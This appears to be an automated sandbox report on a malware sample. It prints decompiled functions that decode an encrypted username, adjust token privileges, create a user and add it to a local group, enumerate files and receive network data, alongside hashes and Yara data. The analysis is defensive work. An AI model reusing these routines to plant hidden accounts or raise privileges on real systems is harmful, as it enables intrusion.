                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 0e41e32ab8529b89cfc9c15556c76dd3341a685d90ea54b3428443690f48773c
                                      • Instruction ID: 90512de610bc907605d25dbb147376f56d4fdec8015d53dea22a85c176bcbbf6
                                      • Opcode Fuzzy Hash: 0e41e32ab8529b89cfc9c15556c76dd3341a685d90ea54b3428443690f48773c
                                      • Instruction Fuzzy Hash: F831E87591122DABCB21DF28D8887DDBBF8BF18310F5042EAE51CA7250E7309B958F44
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Function 00259E04, Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00259E04(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E00251130(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E00251052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E00255A3C(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}














                                      0x00259e04
                                      0x00259e0c
                                      0x00259e1e
                                      0x00259e21
                                      0x00259e34
                                      0x00259e4f
                                      0x00259e5b
                                      0x00259e5e
                                      0x00259e64
                                      0x00259e6f
                                      0x00259e73
                                      0x00259e76
                                      0x00259e79
                                      0x00259e85
                                      0x00259e8e
                                      0x00259e9a
                                      0x00259ea6

                                      APIs
                                      • lstrlenA.KERNEL32(?,?,?,00000000,?,002596F1,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 00259E21
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00259E4F
                                        • Part of subcall function 00255A3C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0025347F,?,?,?,0025F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00255A46
                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00259E9C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                      • String ID:
                                      • API String ID: 573875632-0
                                      • Opcode ID: d5d1ad97f50a7825d2e8ada61b50883cbed24518320e03f5d34aee94a6d78776
                                      • Instruction ID: 97bed41ab49a00d9fccbf83a262132bf96cbfb33be078c08d942913fc2f9c9a2
                                      • Opcode Fuzzy Hash: d5d1ad97f50a7825d2e8ada61b50883cbed24518320e03f5d34aee94a6d78776
                                      • Instruction Fuzzy Hash: 3911D8B5D00119EFCB01DFA4D8848EEBBB8EF08344F1081AAE909A2241D7759A15CBA0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025D609, Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 60%
                                      			E0025D609(void* __ecx, WCHAR** __edx) {
				void* _v8;
				long _v12;
				struct _LUID _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _TOKEN_PRIVILEGES _v36;
				struct _TOKEN_PRIVILEGES _v52;
				WCHAR** _t33;

				asm("stosd");
				asm("xorps xmm0, xmm0");
				_v8 = 0;
				_t33 = __edx;
				asm("movlpd [ebp-0x10], xmm0");
				_v12 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(OpenProcessToken(__ecx, 0x28,  &_v8) == 0 || LookupPrivilegeValueW(0,  *_t33,  &_v20) == 0) {
					L4:
					return 0;
				} else {
					_v36.Privileges = _v20.LowPart;
					_v28 = _v20.HighPart;
					_v36.PrivilegeCount = 1;
					_v24 = 2;
					if(AdjustTokenPrivileges(_v8, 0,  &_v36, 0x10,  &_v52,  &_v12) == 0) {
						goto L4;
					}
					return 1;
				}
			}











                                      0x0025d617
                                      0x0025d61a
                                      0x0025d61d
                                      0x0025d620
                                      0x0025d622
                                      0x0025d627
                                      0x0025d62a
                                      0x0025d62b
                                      0x0025d62c
                                      0x0025d63c
                                      0x0025d688
                                      0x00000000
                                      0x0025d64f
                                      0x0025d655
                                      0x0025d65e
                                      0x0025d668
                                      0x0025d673
                                      0x0025d682
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0025d684

                                      APIs
                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0025C423), ref: 0025D634
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0025D645
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0025D67A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                      • String ID:
                                      • API String ID: 658607936-0
                                      • Opcode ID: 84c3b3695e2662c864e8060adad025688b7097d55a60a20dcbeff597a91dc1fd
                                      • Instruction ID: 3c0b510c7b5241a5b6e53cfcdd2e98d2973c7e62742688033136c16397f0555f
                                      • Opcode Fuzzy Hash: 84c3b3695e2662c864e8060adad025688b7097d55a60a20dcbeff597a91dc1fd
                                      • Instruction Fuzzy Hash: 69111F75A10619BFEB10CFA5DC449EFF7FCFB48750F10452AE901F2150E6B09A098BA1
                                      Uniqueness

                                      Uniqueness Score: 7.75%

                                      Function 012E528C, Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,012E528B,?,00000000,?,?), ref: 012E52AE
                                      • TerminateProcess.KERNEL32(00000000,?,012E528B,?,00000000,?,?), ref: 012E52B5
                                      • ExitProcess.KERNEL32 ref: 012E52C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: 207302c2ab76863a9a3756bea3698b6b3ebcbdb834c5c22a6b6f545b55b996dd
                                      • Instruction ID: 2cfcc268a3e4c65abb777d528f662a0db9a5a6530d44101d9517c224c354f33f
                                      • Opcode Fuzzy Hash: 207302c2ab76863a9a3756bea3698b6b3ebcbdb834c5c22a6b6f545b55b996dd
                                      • Instruction Fuzzy Hash: C0E08C39021909AFCF2A6F69D92CA1D3FECFB01345F800415FB0986130CB36D882CB80
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 012E879D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      • Opcode ID: 6c3a32756ac9c0eaddd19bb26ad634daae8f7441e9f5c95f4d6ccfc143efdc6b
                                      • Instruction ID: ee0ac2daca9a41eff6c5bdb5cc3722e711cc4ec8e7d396a3d1cc24a357d645b4
                                      • Opcode Fuzzy Hash: 6c3a32756ac9c0eaddd19bb26ad634daae8f7441e9f5c95f4d6ccfc143efdc6b
                                      • Instruction Fuzzy Hash: E131367581020EAFEB29CE6CCC88EFE7BFDDF85354F440198EA9997251E6309D458B90
                                      Uniqueness

                                      Uniqueness Score: 0.05%

                                      Function 012EB840, Relevance: 3.5, APIs: 2, Instructions: 461COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction ID: e8112566a8d57e75b281da41d1531d13d3067abfe9fc17de9839b03db5f95da9
                                      • Opcode Fuzzy Hash: 414003ae960f4cd5d2996c738a1b52f0fc48d571ea6a9649de418972638e5d02
                                      • Instruction Fuzzy Hash: 8F025C71E1021A9FDF14CFA9C8846AEBBF1FF88314F55826ED919A7345E731A901CB80
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      Function 0025DEC5, Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 72%
                                      			E0025DEC5(void* __ecx, void* __eflags, WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v56;
				struct _WIN32_FIND_DATAW _v648;
				intOrPtr _t39;
				void* _t62;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;

				_v20 = _v20 & 0x00000000;
				_t39 = 5;
				_t75 = __ecx;
				_v16 = _t39;
				_v24 = _t39;
				E00251815( &_v28, __eflags);
				_t62 = FindFirstFileW(_a4,  &_v648);
				_t79 = _t62 - 0xffffffff;
				while(_t79 != 0) {
					_v56 = _v56 & 0x00000000;
					__eflags = _v648.dwFileAttributes & 0x00000010;
					if((_v648.dwFileAttributes & 0x00000010) == 0) {
						_t16 =  &_v40;
						 *_t16 = _v40 & 0x00000000;
						__eflags =  *_t16;
						_v48 = _v648.nFileSizeLow;
						_v44 = _v648.nFileSizeHigh;
					} else {
						asm("xorps xmm0, xmm0");
						_v40 = 1;
						asm("movlpd [ebp-0x2c], xmm0");
					}
					E00253264( &_v56, E00253412( &_v12,  &(_v648.cFileName)));
					E00255A2D(_v12);
					_v12 = _v12 & 0x00000000;
					_t77 = _t77 - 0x18;
					_t76 = _t77;
					E0025345A(_t76,  &_v56);
					 *((intOrPtr*)(_t76 + 8)) = _v48;
					 *((intOrPtr*)(_t76 + 0xc)) = _v44;
					 *(_t76 + 0x10) = _v40;
					E00251716( &_v28);
					E00255A2D(_v56);
					__eflags = FindNextFileW(_t62,  &_v648);
				}
				E00251301(_t75, _t79,  &_v28);
				_t73 = _v28;
				if(_v28 != 0) {
					E00251A75(_t73, _t73);
				}
				E00255A2D(_a4);
				return _t75;
			}



















                                      0x0025dece
                                      0x0025ded7
                                      0x0025ded8
                                      0x0025deda
                                      0x0025dee0
                                      0x0025dee3
                                      0x0025def8
                                      0x0025defa
                                      0x0025df9c
                                      0x0025df02
                                      0x0025df06
                                      0x0025df0d
                                      0x0025df2c
                                      0x0025df2c
                                      0x0025df2c
                                      0x0025df30
                                      0x0025df33
                                      0x0025df0f
                                      0x0025df0f
                                      0x0025df12
                                      0x0025df19
                                      0x0025df19
                                      0x0025df49
                                      0x0025df51
                                      0x0025df56
                                      0x0025df5d
                                      0x0025df60
                                      0x0025df65
                                      0x0025df70
                                      0x0025df76
                                      0x0025df7c
                                      0x0025df7f
                                      0x0025df87
                                      0x0025df9a
                                      0x0025df9a
                                      0x0025dfa8
                                      0x0025dfad
                                      0x0025dfb2
                                      0x0025dfb5
                                      0x0025dfb5
                                      0x0025dfbd
                                      0x0025dfc8

                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0025DEF2
                                      • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0025DF94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID:
                                      • API String ID: 1690352074-0
                                      • Opcode ID: 24327ee636a546058b39f23379d4f407877901c3dc8e3fc610cb61341d4fc308
                                      • Instruction ID: 5876c7648d9285b989280f7ad3af5051e42af5729c9cd1721e552b82c1b8a862
                                      • Opcode Fuzzy Hash: 24327ee636a546058b39f23379d4f407877901c3dc8e3fc610cb61341d4fc308
                                      • Instruction Fuzzy Hash: 6E317371D112099BCB20EFA4C999BEEBBF4AF48312F104159E806B3241EB749E58CF54
                                      Uniqueness

                                      Uniqueness Score: 0.95%

                                      Function 0025B799, Relevance: 3.1, APIs: 2, Instructions: 57UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 50%
                                      			E0025B799(char _a4, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				void _v36;
				void* _t22;
				intOrPtr* _t25;
				signed int _t30;
				intOrPtr* _t38;

				_t38 = _a4;
				_t30 = 8;
				memset( &_v36, 0, _t30 << 2);
				_v36 =  *_t38;
				_v24 = 1;
				_v20 = 0;
				_v32 =  *_a8;
				_t22 =  &_v36;
				_v16 = 0;
				_v12 = 0x10201;
				_v8 = 0;
				__imp__NetUserAdd(0, 1, _t22, 0);
				_t42 = _t22;
				if(_t22 != 0) {
					L3:
					__eflags = 0;
					return 0;
				}
				_a4 =  *_t38;
				_t25 = E0025D508( &_a8, _t42);
				__imp__NetLocalGroupAddMembers(0,  *_t25, 3,  &_a4, 1);
				E00255A2D(_a8);
				if(_t25 != 0) {
					goto L3;
				}
				return 1;
			}














                                      0x0025b7a1
                                      0x0025b7a9
                                      0x0025b7af
                                      0x0025b7b5
                                      0x0025b7bd
                                      0x0025b7c0
                                      0x0025b7c5
                                      0x0025b7c8
                                      0x0025b7ce
                                      0x0025b7d1
                                      0x0025b7d8
                                      0x0025b7db
                                      0x0025b7e1
                                      0x0025b7e3
                                      0x0025b814
                                      0x0025b814
                                      0x00000000
                                      0x0025b814
                                      0x0025b7ea
                                      0x0025b7ed
                                      0x0025b7fc
                                      0x0025b807
                                      0x0025b80e
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,00267D34,?,?,?,0025C8B8,00267D30,00267D34), ref: 0025B7DB
                                        • Part of subcall function 0025D508: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0025B7F2,?,?,00000001), ref: 0025D55D
                                        • Part of subcall function 0025D508: LookupAccountSidW.ADVAPI32(00000000,0025B7F2,?,00000104,?,00000010,?), ref: 0025D582
                                        • Part of subcall function 0025D508: GetLastError.KERNEL32(?,?,00000001), ref: 0025D58C
                                        • Part of subcall function 0025D508: FreeSid.ADVAPI32(0025B7F2,?,?,00000001), ref: 0025D59A
                                      • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0025C8B8,00267D30,00267D34), ref: 0025B7FC
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                      • String ID:
                                      • API String ID: 188019324-0
                                      • Opcode ID: 88accb11fecb0d3fd1e6edff270b09c4d74cbcc95723839a45f52f8e7e46205a
                                      • Instruction ID: 9cded53847c21317aea66958988dd6efe8dcdadaec8a3ecb5a502232d2bb78f6
                                      • Opcode Fuzzy Hash: 88accb11fecb0d3fd1e6edff270b09c4d74cbcc95723839a45f52f8e7e46205a
                                      • Instruction Fuzzy Hash: E5114C72910208AFDB11DFA9D8849AEB7FCEF58315B00802AE901EB250D7B09A088B60
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012EFA19, Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,012EFA14,?,?,00000008,?,?,012EF6A7,00000000), ref: 012EFC46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 6cdaea42bcaf25f069a8af3df99528efc3a79db25031f37a374c5b043883d1e7
                                      • Instruction ID: 6bcb08571a6046e8bf81c21d9ca29c63303f97de25dcfb00cdd7cc149f7b0879
                                      • Opcode Fuzzy Hash: 6cdaea42bcaf25f069a8af3df99528efc3a79db25031f37a374c5b043883d1e7
                                      • Instruction Fuzzy Hash: 56B15B322206099FEB15CF2CC59AB647BE0FF49364F658658EA99CF2A1C335D991CB40
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 0025B424, Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E0025B424(void* __ecx, void* __eflags, intOrPtr* _a4) {
				char _v4100;
				char* _t11;
				intOrPtr* _t21;
				void* _t22;

				E00251130(0x1000, __ecx);
				E00251052( &_v4100, 0, 0x1000);
				_t21 = _a4;
				while(1) {
					_t22 = _t22 + 0xc;
					_t11 =  &_v4100;
					__imp__#16( *_t21, _t11, 0x1000, 0);
					if(_t11 == 0xffffffff) {
						break;
					}
					if(E0025B62E( *((intOrPtr*)(_t21 + 4)),  &_v4100, _t11) != 0) {
						E00251052( &_v4100, 0, 0x1000);
						continue;
					}
					break;
				}
				return 0;
			}







                                      0x0025b42c
                                      0x0025b442
                                      0x0025b447
                                      0x0025b46f
                                      0x0025b46f
                                      0x0025b472
                                      0x0025b47e
                                      0x0025b487
                                      0x00000000
                                      0x00000000
                                      0x0025b45e
                                      0x0025b46a
                                      0x00000000
                                      0x0025b46a
                                      0x00000000
                                      0x0025b45e
                                      0x0025b48e

                                      APIs
                                      • recv.WS2_32(?,?,00001000,00000000), ref: 0025B47E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: e0b9d3bfc80ab93591b04d5fcdaa11f614e3d566827b5535b85e1bc8828839e9
                                      • Instruction ID: 273b11bbe98de18253b3ae15c38ddf4e6dff2fc8413d663ffa1462f0079dbbb4
                                      • Opcode Fuzzy Hash: e0b9d3bfc80ab93591b04d5fcdaa11f614e3d566827b5535b85e1bc8828839e9
                                      • Instruction Fuzzy Hash: 86F0FC7152025866DB219A64DC41FE6735CAB043D6F100455FD44D70C5D7B0EDA88B58
                                      Uniqueness

                                      Uniqueness Score: 0.03%

                                      Function 012E3DFC, Relevance: 1.5, Strings: 1, Instructions: 213COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction ID: e568e2a41005601e0cfccb033c835b967bbb31aea00852fa908c3e41a669c10c
                                      • Opcode Fuzzy Hash: cbe18fcf949fa8ca6a643e9b22d618a315fa225c49b3498eb32cb0358680b79c
                                      • Instruction Fuzzy Hash: E6519932234A875BEB39D92C889DBBF6BE5BF65602FCC0519D782C7282C754D9068352
                                      Uniqueness

                                      Uniqueness Score: 0.04%

